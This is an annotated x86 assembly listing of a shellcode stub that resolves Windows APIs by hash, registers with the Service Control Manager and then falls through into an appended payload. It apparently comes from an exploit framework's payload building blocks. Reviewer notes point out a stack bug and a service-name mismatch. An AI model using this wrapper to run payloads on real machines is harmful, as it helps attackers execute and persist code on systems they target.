;-----------------------------------------------------------------------------;
; Author: agix (florian.gaultier[at]gmail[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Size: 448 bytes
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP must be the address of 'api_call'.
;-----------------------------------------------------------------------------;
; Process entry: load advapi32.dll, hand SvcMain (api_call+0xd0, see below) to
; the SCM via StartServiceCtrlDispatcherA, then ExitProcess once the dispatcher
; returns.  Every API call goes through api_call (address in EBP): arguments are
; pushed right-to-left, then the function hash, then 'call ebp'.
; The offsets 0xc9 / 0xd0 / 0xd6 used in this file are byte distances from
; api_call and depend on the exact encoding of every instruction here; do not
; reorder or re-encode instructions without recomputing them.
;-----------------------------------------------------------------------------;
push byte 0x0 ; NUL terminator
push 0x32336970 ; "pi32"
push 0x61766461 ; "adva" -> the stack now holds "advapi32\0"
push esp ; lpLibFileName = &"advapi32"
push 0x726774c ; hash resolved by api_call to LoadLibraryA
call ebp ;load advapi32.dll  (LoadLibraryA("advapi32"))
push 0x00454349 ; "ICE\0"
push 0x56524553 ; "SERV" -> "SERVICE\0"
mov ecx, esp ;ServiceTableEntry.SVCNAME  (ecx = &"SERVICE")
lea eax, [ebp+0xd0];ServiceTableEntry.SvcMain  (eax = api_call+0xd0, the 'cld' below)
; SERVICE_TABLE_ENTRYA[2] built in place, last dword first.  Only the second
; entry's lpServiceName is NULL; its lpServiceProc slot is the "SERV" string
; dword pushed above, so the terminator is not fully zeroed.  This appears to
; rely on the dispatcher stopping at the NULL name alone.
push 0x00000000 ; [1].lpServiceName = NULL (terminator)
push eax ; [0].lpServiceProc = SvcMain
push ecx ; [0].lpServiceName = "SERVICE"
mov eax,esp ; eax = lpServiceTable
push 0x00000000 ; extra dword below the argument: StartServiceCtrlDispatcherA
                ; takes one parameter, so this is simply left on the stack
                ; (harmless, ExitProcess follows)
push eax ; lpServiceTable
push 0xCB72F7FA ; hash resolved by api_call to StartServiceCtrlDispatcherA
call ebp ;call StartServiceCtrlDispatcherA(ServiceTableEntry)
; Returns only after the SCM is done running SvcMain (or on failure).
push 0x00000000 ; uExitCode = 0
push 0x56A2B5F0 ; hash resolved by api_call to ExitProcess
call ebp ;call ExitProcess(0)  -- does not return
;-----------------------------------------------------------------------------;
; SvcCtrlHandler (api_call+0xc9): the HandlerEx callback that SvcMain registers
; with RegisterServiceCtrlHandlerExA.  It ignores every control code and
; returns 0 (NO_ERROR).
; NOTE(review): HandlerEx is stdcall with four DWORD arguments
; (dwControl, dwEventType, lpEventData, lpContext).  The four pops below
; consume the return address and the first three arguments, so the final 'ret'
; transfers control to lpContext (registered as NULL in SvcMain) rather than
; back to the SCM's dispatcher thread -- confirm the intended stack cleanup.
; Since SvcMain reports dwControlsAccepted = 0, the SCM presumably rejects
; STOP/PAUSE/CONTINUE before they reach this handler, which would explain why
; this path is rarely exercised.
;-----------------------------------------------------------------------------;
pop eax ;SvcCtrlHandler  -- discards the return address
pop eax ; dwControl
pop eax ; dwEventType
pop eax ; lpEventData
xor eax,eax ; return value = NO_ERROR
ret ; pops lpContext as the return target (see note above)
;-----------------------------------------------------------------------------;
; SvcMain (api_call+0xd0): LPSERVICE_MAIN_FUNCTIONA invoked by the SCM on its
; own thread.  Re-derives the api_call address into EBP (it cannot be assumed
; on the new thread), registers SvcCtrlHandler, reports SERVICE_RUNNING, and
; then runs off the end of this listing into whatever follows the stub.
; The SERVICE_STATUS_HANDLE returned by RegisterServiceCtrlHandlerExA is kept
; in EAX across the status-block pushes; nothing in between writes EAX.
;-----------------------------------------------------------------------------;
cld ;SvcMain  (DF cleared, presumably for string instructions in code that follows)
call me ; pushes the address of 'me' = api_call+0xd6
me:
pop ebp ; ebp = &me
sub ebp, 0xd6 ;ebp => hashFunction  (api_call; 0xd6 = SvcMain offset 0xd0 + cld/call = 6 bytes)
; Service name for RegisterServiceCtrlHandlerExA.
; NOTE(review): 0x00464349 is "ICF\0", so the name here spells "SERVICF",
; unlike the "SERVICE" placed in the dispatcher table above.  Presumably
; tolerated because the SCM ignores the name for SERVICE_WIN32_OWN_PROCESS
; services -- confirm.
push 0x00464349 ; "ICF\0"
push 0x56524553 ; "SERV"
mov ecx, esp ;SVCNAME  (ecx = &"SERVICF")
lea eax, [ebp+0xc9];SvcCtrlHandler  (eax = api_call+0xc9)
push 0x00000000 ; lpContext = NULL
push eax ; lpHandlerProc = SvcCtrlHandler
push ecx ; lpServiceName
push 0x5244AA0B ; hash resolved by api_call to RegisterServiceCtrlHandlerExA
call ebp ;RegisterServiceCtrlHandlerExA  -> eax = SERVICE_STATUS_HANDLE (not checked)
; SERVICE_STATUS built on the stack, last field first.  The struct has seven
; DWORDs; the first zero pushed lands past dwWaitHint and is unused padding.
push 0x00000000 ; (unused dword past the end of SERVICE_STATUS)
push 0x00000000 ; dwWaitHint
push 0x00000000 ; dwCheckPoint
push 0x00000000 ; dwServiceSpecificExitCode
push 0x00000000 ; dwWin32ExitCode
push 0x00000000 ; dwControlsAccepted = 0 (no STOP/PAUSE/CONTINUE accepted)
push 0x00000004 ; dwCurrentState = SERVICE_RUNNING
push 0x00000010 ; dwServiceType = SERVICE_WIN32_OWN_PROCESS
mov ecx, esp ; ecx = &SERVICE_STATUS
push 0x00000000 ; extra dword below the arguments: SetServiceStatus takes two,
                ; so this stays on the stack
push ecx ; lpServiceStatus
push eax ; hServiceStatus
push 0x7D3755C6 ; hash resolved by api_call to SetServiceStatus
call ebp ;SetServiceStatus RUNNING
; No return here: execution falls through to whatever is appended after this file.